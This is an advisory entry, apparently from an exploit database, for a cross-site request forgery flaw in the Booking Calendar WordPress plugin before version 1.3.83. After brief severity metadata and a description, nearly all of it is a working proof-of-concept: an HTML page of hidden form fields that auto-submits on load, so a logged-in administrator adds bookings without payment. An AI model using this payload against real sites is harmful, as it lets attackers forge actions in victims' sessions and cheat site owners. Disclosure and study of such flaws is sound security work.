Booking Calendar < 1.3.83 - CSRF appointment scheduling

2024-02-2800:00:00

Sushil Phuyal

csrf appointment scheduling

exploit

hidden form

6.7 Medium

AI Score

Confidence

Low

0.0004 Low

EPSS

Percentile

9.0%

JSON

Description The plugin does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks such as adding a booking to the calendar without paying.

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=cpabc_appointments.php&cal=1&addbk=1&r=0.1210213745316624" method="POST">
      <input type="hidden" name="cpabc_appointments_post" value="1" />
      <input type="hidden" name="cpabc_appointments_utime" value="GMT 5.75" />
      <input type="hidden" name="cpabc_item" value="1" />
      <input type="hidden" name="selDaycal1" value=";2024,1,18 16:00" />
      <input type="hidden" name="selMonthcal1" value=";2024,1,19 16:00;2024,1,20 16:00;2024,1,21 16:00;2024,1,22 16:00" />
      <input type="hidden" name="selYearcal1" value="" />
      <input type="hidden" name="selHourcal1" value="" />
      <input type="hidden" name="selMinutecal1" value="" />
      <input type="hidden" name="sendemails_admin" value="1" />
      <input type="hidden" name="freq" value="10" />
      <input type="hidden" name="bydaym" value="1" />
      <input type="hidden" name="end" value="on" />
      <input type="hidden" name="phone" value="91" />
      <input type="hidden" name="name" value="hacker" />
      <input type="hidden" name="email" value="[email protected]" />
      <input type="hidden" name="question" value="hackeone" />
      <input type="hidden" name="subbtn" value="Continue" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>